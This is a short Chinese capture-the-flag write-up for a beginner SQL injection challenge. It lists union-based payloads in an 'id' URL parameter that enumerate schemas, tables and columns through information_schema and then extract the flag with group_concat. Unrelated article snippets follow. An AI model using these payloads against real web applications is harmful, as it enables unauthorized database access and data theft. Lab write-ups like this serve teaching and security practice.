首页 > 数据库 >[第一章 web入门]SQL注入-1

[第一章 web入门]SQL注入-1

时间:2024-07-24 17:10:44浏览次数:12  
标签:web group 入门 union concat --+ SQL id select

[第一章 web入门]SQL注入-1

payload

/index.php?id=1' and 0 union select 1,2,group_concat(fllllag) from fl4g --+

?id=-1' union select 1,2,group_concat(fllllag) from flag --+

Step

库名

?id=-1' union select 1,2,group_concat(SCHEMA_NAME) from information_schema.schemata --+

表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

字段名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='fl4g' --+

字段值

?id=-1' union select 1,2,group_concat(fllllag) from fl4g --+

得到flag

标签:web,group,入门,union,concat,--+,SQL,id,select
From: https://www.cnblogs.com/bolerat/p/18321276

相关文章

  • 一种WebService的调用方式
    publicstaticvoidsendMesWebService(Stringtel,Stringstr)throwsException{Serviceservice=newService();//new一个服务Callcall=(Call)service.createCall();//创建一个call对象call.setTargetEndpointAddress(endpoint);//......
  • Locust 压测websocket协议
    Locust自带的HttpLocust类只支持http,并不支持websocket,但实现websocket压测只需要三步。1、第一步需要自己写一个websocketclient的类,实现连接、发送、接受、关闭连接等方法importwebsocketclassWebSocketClient(object):def__init__(self,host):self.hos......
  • MySQL 学习笔记 基础(多表查询下,事务)
    多表查询 多表查询-子查询概念:SQL语句中嵌套SELECT语句,称为嵌套语句,又称子查询。SELECT*FROMt1WHEREcolumn=(SELECTcolumn1FROMt2);子查询外部的语句可以是INSERT/UPDATE/DELETE/SELECT的任何一个。根据子查询结果不同,分为:·标量子查询......
  • MySQL中多表查询之外连接
     首先先来介绍一下我做的两个表,然后再用他们两个举例说明。--创建教师表createtableteachers(id_tintprimarykeyauto_increment,--老师编号name_tvarchar(5)--姓名);--创建学生表createtablestudents(id_sintprimarykeyauto_increment,--编号na......
  • SPI协议——结合百问网STM32入门 STM32 HAL快速入门与项目实战视频
    目录1、SPI协议的概念2、SPI的传输模式2.1SPI工作模式2.2SPI传输模式2.3SPI操作方法3、时序图4、代码实现4.1SPIHAL库编程4.2中断方式4.3DMA方式函数说明5、总结5.1SPI协议的优点5.2SPI协议的缺点1、SPI协议的概念SPI(SerialPeripheralInterface,......
  • 【YashanDB知识库】stmt未close,导致YAS-00103 no free block in sql main pool part 0
    问题现象问题单:YAS-00103nofreeblockinsqlmainpoolpart0,YAS-00105outofmemorytoallocatehashtableofsize=256现象:业务处理sql时,报错YAS-00103nofreeblockinsqlmainpoolpart0问题风险及影响业务处理报错,影响功能使用问题影响版本客户版本:22.2.4......
  • MYSQL中SHOW PROCESSLIST使用
    SHOWPROCESSLIST是显示用户正在运行的线程,需要注意的是,除了root用户能看到所有正在运行的线程外,其他用户都只能看到自己正在运行的线程,看不到其它用户正在运行的线程。除非单独个这个用户赋予了PROCESS权限。通常我们通过top检查发现mysqlCPU或者iowait过高那么解决这些问题......
  • 逆向分析学习入门教程(非常详细)零基础入门到精通,看这一篇就够了!_逆向都要学啥
    前沿从本篇起,逆向工厂带大家从程序起源讲起,领略计算机程序逆向技术,了解程序的运行机制,逆向通用技术手段和软件保护技术,更加深入地去探索逆向的魅力。一、程序如何诞生?1951年4月开始在英国牛津郡哈维尔原子能研究基地正式投入使用的英国数字计算机“哈维尔·德卡特伦”,是......
  • Mysql性能优化
    以下配置需要找到MySQL的my.cnf的配置文件,在文件中修改,增加或者修改以下配置字符集character_set_server=utf8init-connect='SETNAMESutf8'validate_password=OFF大小写lower_case_table_names=1扩展设置最大链接数初始100,链接超过之后就不能连接max_connections=5......
  • JS之webpack
    目录一、认识webpack1.1webpack数组形式1.2webpackde对象形式一、认识webpackWebpack是一个现代的静态模块打包工具,它主要用于前端开发中的模块化打包和构建。通过Webpack,开发者可以将多个模块(包括JavaScript、CSS、图片等)进行打包,生成优化后的静态资源文件,以供在浏览器中加......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99